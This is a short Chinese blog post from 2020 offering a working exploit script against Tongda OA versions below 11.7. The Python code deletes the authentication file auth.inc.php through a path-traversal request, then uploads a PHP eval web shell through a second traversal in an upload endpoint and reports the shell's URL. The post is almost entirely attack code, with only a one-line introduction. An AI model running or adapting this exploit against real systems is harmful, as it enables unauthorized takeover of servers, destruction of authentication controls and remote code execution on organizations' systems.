通达oa-0day-exp

发布于 2020-08-19  213 次阅读


0x01 简介

漏洞可利用版本: <11.7 该漏洞存在危害性,推荐自己搭建环境测试

0x02 Exp

import sys
import requests

if len(sys.argv) == 2:
    target= sys.argv[1]
    payload="<?php @eval($_POST['ant']);?>"
    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to deleted auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('ant.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/_ant.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]Filed Uploaded Successfully")
        print("[+]URL:",url)
    else:
        print("[-]Failed to upload file")
else:
    print("Tips:python3 tongda.py http://url")

我不懂世界到底在热闹些什么